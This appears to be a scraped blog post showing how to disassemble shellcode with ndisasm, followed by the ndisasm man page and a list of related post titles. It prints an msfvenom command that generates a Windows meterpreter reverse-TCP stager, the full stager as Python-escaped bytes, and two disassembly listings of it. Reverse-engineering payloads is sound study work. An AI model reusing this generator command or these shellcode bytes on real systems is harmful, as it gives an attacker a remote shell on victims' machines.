msfvenom / ndisasm - disass shellcode
来源:互联网 发布:apache 安装教程 编辑:程序博客网 时间:2024/06/05 11:41
root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win | ndisasm -u -Found 0 compatible encoders00000000 FC cld00000001 E886000000 call dword 0x8c00000006 60 pushad00000007 89E5 mov ebp,esp00000009 31D2 xor edx,edx0000000B 648B5230 mov edx,[fs:edx+0x30]0000000F 8B520C mov edx,[edx+0xc]00000012 8B5214 mov edx,[edx+0x14]00000015 8B7228 mov esi,[edx+0x28]00000018 0FB74A26 movzx ecx,word [edx+0x26]0000001C 31FF xor edi,edi0000001E 31C0 xor eax,eax00000020 AC lodsb00000021 3C61 cmp al,0x6100000023 7C02 jl 0x2700000025 2C20 sub al,0x2000000027 C1CF0D ror edi,0xd0000002A 01C7 add edi,eax0000002C E2F0 loop 0x1e0000002E 52 push edx0000002F 57 push edi00000030 8B5210 mov edx,[edx+0x10]00000033 8B423C mov eax,[edx+0x3c]00000036 8B4C1078 mov ecx,[eax+edx+0x78]0000003A E34A jecxz 0x860000003C 01D1 add ecx,edx0000003E 51 push ecx0000003F 8B5920 mov ebx,[ecx+0x20]00000042 01D3 add ebx,edx00000044 8B4918 mov ecx,[ecx+0x18]00000047 E33C jecxz 0x8500000049 49 dec ecx0000004A 8B348B mov esi,[ebx+ecx*4]0000004D 01D6 add esi,edx0000004F 31FF xor edi,edi00000051 31C0 xor eax,eax00000053 AC lodsb00000054 C1CF0D ror edi,0xd00000057 01C7 add edi,eax00000059 38E0 cmp al,ah0000005B 75F4 jnz 0x510000005D 037DF8 add edi,[ebp-0x8]00000060 3B7D24 cmp edi,[ebp+0x24]00000063 75E2 jnz 0x4700000065 58 pop eax00000066 8B5824 mov ebx,[eax+0x24]00000069 01D3 add ebx,edx0000006B 668B0C4B mov cx,[ebx+ecx*2]0000006F 8B581C mov ebx,[eax+0x1c]00000072 01D3 add ebx,edx00000074 8B048B mov eax,[ebx+ecx*4]00000077 01D0 add eax,edx00000079 89442424 mov [esp+0x24],eax0000007D 5B pop ebx0000007E 5B pop ebx0000007F 61 popad00000080 59 pop ecx00000081 5A pop edx00000082 51 push ecx00000083 FFE0 jmp eax00000085 58 pop eax00000086 5F pop edi00000087 5A pop edx00000088 8B12 mov edx,[edx]0000008A EB89 jmp short 0x150000008C 5D pop ebp0000008D 6833320000 push dword 0x323300000092 687773325F push dword 0x5f32737700000097 54 push esp00000098 684C772607 push dword 0x726774c0000009D FFD5 call ebp0000009F B890010000 mov eax,0x190000000A4 29C4 sub esp,eax000000A6 54 push esp000000A7 50 push eax000000A8 6829806B00 push dword 0x6b8029000000AD FFD5 call ebp000000AF 50 push eax000000B0 50 push eax000000B1 50 push eax000000B2 50 push eax000000B3 40 inc eax000000B4 50 push eax000000B5 40 inc eax000000B6 50 push eax000000B7 68EA0FDFE0 push dword 0xe0df0fea000000BC FFD5 call ebp000000BE 97 xchg eax,edi000000BF 6A05 push byte +0x5000000C1 687F000001 push dword 0x100007f000000C6 680200115C push dword 0x5c110002000000CB 89E6 mov esi,esp000000CD 6A10 push byte +0x10000000CF 56 push esi000000D0 57 push edi000000D1 6899A57461 push dword 0x6174a599000000D6 FFD5 call ebp000000D8 85C0 test eax,eax000000DA 740C jz 0xe8000000DC FF4E08 dec dword [esi+0x8]000000DF 75EC jnz 0xcd000000E1 68F0B5A256 push dword 0x56a2b5f0000000E6 FFD5 call ebp000000E8 6A00 push byte +0x0000000EA 6A04 push byte +0x4000000EC 56 push esi000000ED 57 push edi000000EE 6802D9C85F push dword 0x5fc8d902000000F3 FFD5 call ebp000000F5 8B36 mov esi,[esi]000000F7 6A40 push byte +0x40000000F9 6800100000 push dword 0x1000000000FE 56 push esi000000FF 6A00 push byte +0x000000101 6858A453E5 push dword 0xe553a45800000106 FFD5 call ebp00000108 93 xchg eax,ebx00000109 53 push ebx0000010A 6A00 push byte +0x00000010C 56 push esi0000010D 53 push ebx0000010E 57 push edi0000010F 6802D9C85F push dword 0x5fc8d90200000114 FFD5 call ebp00000116 01C3 add ebx,eax00000118 29C6 sub esi,eax0000011A 85F6 test esi,esi0000011C 75EC jnz 0x10a0000011E C3 retIf you have python shellcode, we can disass it also.
root:~ /# cat shellcode.py #!/usr/bin/env python# -*- coding: utf8 -*-buf = ""buf += "\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"buf += "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"buf += "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"buf += "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"buf += "\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59"buf += "\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01"buf += "\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0"buf += "\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58"buf += "\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"buf += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"buf += "\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33"buf += "\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"buf += "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"buf += "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40"buf += "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f"buf += "\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"buf += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff"buf += "\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00"buf += "\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"buf += "\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4"buf += "\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02"buf += "\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec"buf += "\xc3"print bufroot:~ /# python2 shellcode.py | ndisasm -u -00000000 FC cld00000001 E886000000 call dword 0x8c00000006 60 pushad00000007 89E5 mov ebp,esp00000009 31D2 xor edx,edx0000000B 648B5230 mov edx,[fs:edx+0x30]0000000F 8B520C mov edx,[edx+0xc]00000012 8B5214 mov edx,[edx+0x14]00000015 8B7228 mov esi,[edx+0x28]00000018 0FB74A26 movzx ecx,word [edx+0x26]0000001C 31FF xor edi,edi0000001E 31C0 xor eax,eax00000020 AC lodsb00000021 3C61 cmp al,0x6100000023 7C02 jl 0x2700000025 2C20 sub al,0x2000000027 C1CF0D ror edi,0xd0000002A 01C7 add edi,eax0000002C E2F0 loop 0x1e0000002E 52 push edx0000002F 57 push edi00000030 8B5210 mov edx,[edx+0x10]00000033 8B423C mov eax,[edx+0x3c]00000036 8B4C1078 mov ecx,[eax+edx+0x78]0000003A E34A jecxz 0x860000003C 01D1 add ecx,edx0000003E 51 push ecx0000003F 8B5920 mov ebx,[ecx+0x20]00000042 01D3 add ebx,edx00000044 8B4918 mov ecx,[ecx+0x18]00000047 E33C jecxz 0x8500000049 49 dec ecx0000004A 8B348B mov esi,[ebx+ecx*4]0000004D 01D6 add esi,edx0000004F 31FF xor edi,edi00000051 31C0 xor eax,eax00000053 AC lodsb00000054 C1CF0D ror edi,0xd00000057 01C7 add edi,eax00000059 38E0 cmp al,ah0000005B 75F4 jnz 0x510000005D 037DF8 add edi,[ebp-0x8]00000060 3B7D24 cmp edi,[ebp+0x24]00000063 75E2 jnz 0x4700000065 58 pop eax00000066 8B5824 mov ebx,[eax+0x24]00000069 01D3 add ebx,edx0000006B 668B0C4B mov cx,[ebx+ecx*2]0000006F 8B581C mov ebx,[eax+0x1c]00000072 01D3 add ebx,edx00000074 8B048B mov eax,[ebx+ecx*4]00000077 01D0 add eax,edx00000079 89442424 mov [esp+0x24],eax0000007D 5B pop ebx0000007E 5B pop ebx0000007F 61 popad00000080 59 pop ecx00000081 5A pop edx00000082 51 push ecx00000083 FFE0 jmp eax00000085 58 pop eax00000086 5F pop edi00000087 5A pop edx00000088 8B12 mov edx,[edx]0000008A EB89 jmp short 0x150000008C 5D pop ebp0000008D 6833320000 push dword 0x323300000092 687773325F push dword 0x5f32737700000097 54 push esp00000098 684C772607 push dword 0x726774c0000009D FFD5 call ebp0000009F B890010000 mov eax,0x190000000A4 29C4 sub esp,eax000000A6 54 push esp000000A7 50 push eax000000A8 6829806B00 push dword 0x6b8029000000AD FFD5 call ebp000000AF 50 push eax000000B0 50 push eax000000B1 50 push eax000000B2 50 push eax000000B3 40 inc eax000000B4 50 push eax000000B5 40 inc eax000000B6 50 push eax000000B7 68EA0FDFE0 push dword 0xe0df0fea000000BC FFD5 call ebp000000BE 97 xchg eax,edi000000BF 6A05 push byte +0x5000000C1 687F000001 push dword 0x100007f000000C6 680200115C push dword 0x5c110002000000CB 89E6 mov esi,esp000000CD 6A10 push byte +0x10000000CF 56 push esi000000D0 57 push edi000000D1 6899A57461 push dword 0x6174a599000000D6 FFD5 call ebp000000D8 85C0 test eax,eax000000DA 740C jz 0xe8000000DC FF4E08 dec dword [esi+0x8]000000DF 75EC jnz 0xcd000000E1 68F0B5A256 push dword 0x56a2b5f0000000E6 FFD5 call ebp000000E8 6A00 push byte +0x0000000EA 6A04 push byte +0x4000000EC 56 push esi000000ED 57 push edi000000EE 6802D9C85F push dword 0x5fc8d902000000F3 FFD5 call ebp000000F5 8B36 mov esi,[esi]000000F7 6A40 push byte +0x40000000F9 6800100000 push dword 0x1000000000FE 56 push esi000000FF 6A00 push byte +0x000000101 6858A453E5 push dword 0xe553a45800000106 FFD5 call ebp00000108 93 xchg eax,ebx00000109 53 push ebx0000010A 6A00 push byte +0x00000010C 56 push esi0000010D 53 push ebx0000010E 57 push edi0000010F 6802D9C85F push dword 0x5fc8d90200000114 FFD5 call ebp00000116 01C3 add ebx,eax00000118 29C6 sub esi,eax0000011A 85F6 test esi,esi0000011C 75EC jnz 0x10a0000011E C3 retNDISASM(1) NDISASM(1)NAME ndisasm - the Netwide Disassembler, an 80x86 binary file disassemblerSYNOPSIS ndisasm [ -o origin ] [ -s sync-point [...]] [ -a | -i ] [ -b bits ] [ -u ] [ -e hdrlen ] [ -k offset,length [...]] infile ndisasm -h ndisasm -rDESCRIPTION The ndisasm command generates a disassembly listing of the binary file infile and directs it to stdout. OPTIONS -h Causes ndisasm to exit immediately, after giving a summary of its invocation options. -r Causes ndisasm to exit immediately, after displaying its version number. -o origin Specifies the notional load address for the file. This option causes ndisasm to get the addresses it lists down the left hand margin, and the target addresses of PC-relative jumps and calls, right. -s sync-point Manually specifies a synchronisation address, such that ndisasm will not output any machine instruction which encompasses bytes on both sides of the address. Hence the instruction which starts at that address will be correctly disassembled. -e hdrlen Specifies a number of bytes to discard from the beginning of the file before starting disassembly. This does not count towards the calculation of the disassembly offset: the first disassembled instruction will be shown starting at the given load address. -k offset,length Specifies that length bytes, starting from disassembly offset offset, should be skipped over without generating any output. The skipped bytes still count towards the calculation of the disassembly offset. -a or -i Enables automatic (or intelligent) sync mode, in which ndisasm will attempt to guess where synchronisation should be performed, by means of examining the target addresses of the relative jumps and calls it disassembles. -b bits Specifies 16-, 32- or 64-bit mode. The default is 16-bit mode. -u Specifies 32-bit mode, more compactly than using `-b 32'. -p vendor Prefers instructions as defined by vendor in case of a conflict. Known vendor names include intel, amd, cyrix, and idt. The default is intel.RESTRICTIONS ndisasm only disassembles binary files: it has no understanding of the header information present in object or executable files. If you want to disassemble an object file, you should probably be using objdump(1). Auto-sync mode won't necessarily cure all your synchronisation problems: a sync marker can only be placed automatically if a jump or call instruction is found to refer to it before ndisasm actually disassembles that part of the code. Also, if spurious jumps or calls result from disassembling non-machine-code data, sync markers may get placed in strange places. Feel free to turn auto-sync off and go back to doing it manually if necessary.SEE ALSO objdump(1). The Netwide Assembler Project NDISASM(1) Manual page ndisas 0 0
- msfvenom / ndisasm - disass shellcode
- msfvenom生成shellcode
- msfvenom 生成shellcode
- msfvenom
- msfvenom
- msfvenom
- msfvenom参数
- msfvenom反弹
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- shellcode
- Shellcode
- shellcode
- shellcode
- Shellcode
- 今天要反省一下自己
- 数据结构与算法——插入排序(Java实现)
- 我的Java开发学习之旅------>Java经典排序算法之冒泡排序
- 深入学习ListView
- set,map,hash_set,hash_map概览
- msfvenom / ndisasm - disass shellcode
- SecretDo思秘达-商务日记
- SGU143 Long Live the Queen
- 视频会议之BigBlueButton
- 统计字符1的个数
- 结构、构造函数
- [machine learning]ng lecture
- 内容大全
- 微信jsapi-java初步接入
